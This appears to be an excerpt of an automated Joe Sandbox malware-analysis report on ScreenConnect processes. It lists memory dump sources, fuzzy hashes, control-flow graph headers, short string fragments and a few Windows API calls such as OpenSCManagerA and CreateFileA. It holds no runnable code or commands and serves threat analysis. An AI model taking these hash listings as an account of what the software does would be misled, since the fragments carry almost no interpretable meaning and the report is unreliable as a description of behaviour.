                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9e49f633442388709533c05c5b965e8a869ab16792a02ca29fded5de139aae93
                                                                                                                                                                                                                                                          • Instruction ID: ed095d605667746f07b25744136ca294d743290933b4a26f7bfb3e96d3dbd226
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e49f633442388709533c05c5b965e8a869ab16792a02ca29fded5de139aae93
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C118231A00204AFCB51DE68DC006AE7BE5EB88620B04813DD80AE7741DB35ED028B94
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828467715.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828467715.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 09f4437c289d64772f8b9495e826b1352b2491d20b12d4bdc7e874ca1e3b57d3
                                                                                                                                                                                                                                                          • Instruction ID: 7f419417bde96793eae336b0d1851191e12cdd3b021e7dcf69ef63e7f3bcdaaf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f4437c289d64772f8b9495e826b1352b2491d20b12d4bdc7e874ca1e3b57d3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F09E634041540BE721C628EC517D62BD5EBA2230B0845DED446CF251D659F90A8769
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 45feb63c5e110d8b2754cdb905b72b665860c6a901afbfe5c01e29fb801e53ed
                                                                                                                                                                                                                                                          • Instruction ID: 6de3fc77a3da5628d6c6bf9863743af29de5aa66da08d1436ee618c166f44131
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45feb63c5e110d8b2754cdb905b72b665860c6a901afbfe5c01e29fb801e53ed
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE09232761405ABCF40C15A9C4579276CFDB4816DFBDD631F426C7242FB10EC018292
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9488904ab36f2804ff3f481a0e4cb6806f975df6e0cd364c0a0d8d991cec6181
                                                                                                                                                                                                                                                          • Instruction ID: 28a837502216d00ee511d72f3a81371606ef2be5cfea2686f22deb24cb866404
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9488904ab36f2804ff3f481a0e4cb6806f975df6e0cd364c0a0d8d991cec6181
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0A039A40300CFCB648B64AC186A87BAAFB91326B089079E82F9B614C7368C40CF54
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0fbdb47c0fbd1318de3a124dbbdde723042aa267b4e11556b7248a26dfad2a14
                                                                                                                                                                                                                                                          • Instruction ID: 92f2abe23546432c4f9712c122950d7fd9355c94eb0da6dccd588ff939f20cf1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fbdb47c0fbd1318de3a124dbbdde723042aa267b4e11556b7248a26dfad2a14
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21F030313007149B8B11AA99EC1059F77DAEBC9970744813DD80AEB750DB78EC059BD5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 58cf7287bf6f064da0030277cf6dd1ce8d52cf698030625fc653611cf5296da9
                                                                                                                                                                                                                                                          • Instruction ID: afde20fdd9b773ec0874ad83cd9057ee390d5db2095e8c0cffe37e971eea3b0a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58cf7287bf6f064da0030277cf6dd1ce8d52cf698030625fc653611cf5296da9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E04F31704314979B145A9B788852EBADEFBC8A75754413EF60AC3340DE659C1983A5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2f01533a92262e5ed5676798e2aa4fe295846d855a2c2d9b6dcb45fcc5e7f342
                                                                                                                                                                                                                                                          • Instruction ID: 2d3a16b71ff4ad2896d8831be08f53831dbcffd40ec9a28c818a975600d2ce52
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f01533a92262e5ed5676798e2aa4fe295846d855a2c2d9b6dcb45fcc5e7f342
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E092363103545BC7549769EC0DA6E7BAEEBD5532F044126E906C33D4CE349C0187A4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c0ce0a0846b9e89cd92c3491aa97838997742b357b428ec6da174c5d2a71b25c
                                                                                                                                                                                                                                                          • Instruction ID: 58bde0c550f4f9d22768f65b1ea04a029f337dc01af700df803c856464dddd8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0ce0a0846b9e89cd92c3491aa97838997742b357b428ec6da174c5d2a71b25c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E08C32B414519B8F10819E9C45655B7CBCB892ADFBDD671F82ACB381FB21DC02C382
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 269e2a267802e1f3b3f523a200711c22f75aa2cf5348fbd8a27e504e3083c6ba
                                                                                                                                                                                                                                                          • Instruction ID: acb96e8c1721d083c3080b5627ced2fbca4a7e8bb9edf4a69400665966062fea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269e2a267802e1f3b3f523a200711c22f75aa2cf5348fbd8a27e504e3083c6ba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE0CD3210061917E765D618FC81BDF27D7FBE9230F040A7DF44197201DA65BD4947A9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd

Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 206
Total number of Limit Nodes: 13

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;#$k!
                                                                                                                                                                                                                                                          • API String ID: 0-1260452682

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;#$k!
                                                                                                                                                                                                                                                          • API String ID: 0-1260452682

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s$t*s
                                                                                                                                                                                                                                                          • API String ID: 0-800204968

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 058817AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909411232.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 058817AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909411232.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0463D59D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909012789.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4630000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0463D59D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909012789.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4630000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                                          • API String ID: 0-2564639436

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: {!v
                                                                                                                                                                                                                                                          • API String ID: 0-1174554413

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: {!v
                                                                                                                                                                                                                                                          • API String ID: 0-1174554413

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: [$q
                                                                                                                                                                                                                                                          • API String ID: 0-2640076843

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: [$q
                                                                                                                                                                                                                                                          • API String ID: 0-2640076843

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq
                                                                                                                                                                                                                                                          • API String ID: 0-2853737484
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq
                                                                                                                                                                                                                                                          • API String ID: 0-2853737484
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq
                                                                                                                                                                                                                                                          • API String ID: 0-2853737484
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s
                                                                                                                                                                                                                                                          • API String ID: 0-1920582113
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 47c1ce1d67db1eec7ce4410b8eae3281cf7b1f2b4034f64f7121e16e74885ada
                                                                                                                                                                                                                                                          • Instruction ID: 462ec6c313c5e01998400a3e34b326e38f533d867e34c1716a3d29482e0692da
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47c1ce1d67db1eec7ce4410b8eae3281cf7b1f2b4034f64f7121e16e74885ada
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8271E175B002099FCB55DF79D884AAEBBF6FF88610B1480AAD506DB361DB30DD06CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 30bd20d8fb7174e549ab2dc7a7f69c88329d0c4ba1e0eeb19fbc223a6beba96a
                                                                                                                                                                                                                                                          • Instruction ID: 3da3308e4431722b8bc8ecb54953457f85607c4aa25cdcaac0b80f171fb703e1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30bd20d8fb7174e549ab2dc7a7f69c88329d0c4ba1e0eeb19fbc223a6beba96a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9617131F002198BEB15DFA9C8517AE7BB2AFC5B50F14852EE402BB384DF359D428795
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e4ae41622af4c608fc0a17d5380223489d37682986ad47126fe478aeec2d1de5
                                                                                                                                                                                                                                                          • Instruction ID: c7a24b5ce4692ddc9474a966f4e7f7bf99149ccbc836deb81287dd48c8d7ce2c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4ae41622af4c608fc0a17d5380223489d37682986ad47126fe478aeec2d1de5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B561E574B106099FDB14DFA8D894AAEB7F2FF8D615B108198E506EB365DB30EC019B80
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5723942133b8a22b1a788f58fd97bf2587eec76888623720c1432c8922114bcc
                                                                                                                                                                                                                                                          • Instruction ID: b9f9653d5b015a54156628283b5a94ab06a20a4e3a0c9aa8ea98b91336c5da62
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5723942133b8a22b1a788f58fd97bf2587eec76888623720c1432c8922114bcc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A51353470030A9FDB15DFA8C895A6AB7F6FF98614714856CE546CF326DB34EC028B91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
